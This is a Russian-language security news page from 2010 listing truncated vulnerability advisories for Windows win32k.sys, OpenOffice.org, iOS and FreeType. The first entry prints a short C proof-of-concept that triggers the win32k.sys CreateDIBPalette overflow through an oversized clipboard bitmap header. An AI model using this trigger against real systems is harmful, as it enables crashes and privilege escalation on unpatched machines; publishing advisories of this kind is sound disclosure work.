Меню сайта |
|
|
Разделы новостей |
|
|
Наш опрос |
|
|
|
Главная » 2010 » Август » 09
Эксплоит на C, эксплуатирует отказ в обслуживании в драйвере
win32k.sys DEVMODE dm = {0};
dm.dmSize = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);
BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;
HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);
OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 1128 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
07 августа, 2010
Программа:
Microsoft Windows
XP
Microsoft Windows 2003
Microsoft Windows Vista
Microsoft Windows 2008
Microsoft Windows 7
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на
системе.
Уязвимость существует из-за ошибки проверки границ данных в функции
CreateDIBPalette() в драйвере win32k.sys при копировании значений цветов
в фиксированный буфер во время создания DIB палитры. Локальный
пользователь может вызвать переполнение буфера через GetClipboardData()
API, указав слишком большое количество цветов (более 256) через поле
"biClrUsed" в структуре BITMAPINFOHEADE
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 961 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
06 августа, 2010
Программа: OpenOffice.org 3.2.1 для
Windows,
возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить
произвольный код на целевой системе.
1. Уязвимость существует из-за ошибки усечения целочисленных при
обработке определенных данных. Удаленный пользователь может с помощью
специально сформированного файла вызвать переполнение динамической
памяти и выполнить произвольный код на целевой системе.
2. Уязвимость существует из-за целочисленного переполнения при обработке
некоторых данных. Удаленный пользователь может с помощью специально
сформированного файла вызвать переполнение динамической памяти и
выполнить произвольный код на це
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 623 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
06 августа, 2010
Программа: Apple IPhone OS (iOS)
4.0.1, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют злоумышленнику повысить свои
привилегии и выполнить произвольный код на устройстве.
1. Уязвимость существует из-за неизвестной ошибки в ядре, которая
позволяет локальному пользователю повысить свои привилегии.
2. Уязвимость существует из-за ошибки при обработке определенных опкодов
в CFF (Compact Font Format) шрифте, встроенном, например, в PDF файл.
Удаленный пользователь может с помощью специально сформированного PDF
файла вызвать повреждение памяти и выполнить произвольный код на целевой
системе.
Примечание: уязвимости используются в настоящее время дл
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 586 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
Множественные
уязвимости в FreeType
09 августа, 2010
Программа: FreeType 2.4.2, возможно
другие версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить
произвольный код на целевой системе.
1. Уязвимость существует из-за ошибок при обработке опкодов в Compact
Font Format (CFF) шрифтах. Удаленный пользователь может с помощью
специально сформированного CFF шрифта вызвать переполнение стека и
выполнить произвольный код на целевой системе. Уязвимость относится к:
www.securitylab.ru/vulnerability/396494.php
2. Уязвимость существует из-за ошибки проверки границ данных в функции
Mac_Read_POST_Resou
...
Читать дальше »
Категория: Уязвимости |
Просмотров: 662 |
Добавил: Sgw32 |
Дата: 09.08.2010
|
|
|
|
|
Форма входа |
|
|
Календарь новостей |
« Август 2010 » | Пн | Вт | Ср | Чт | Пт | Сб | Вс | | | | | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 |
|
|
Поиск |
|
|
Друзья сайта |
Limit Calculator
|
|
Статистика |
|
|
|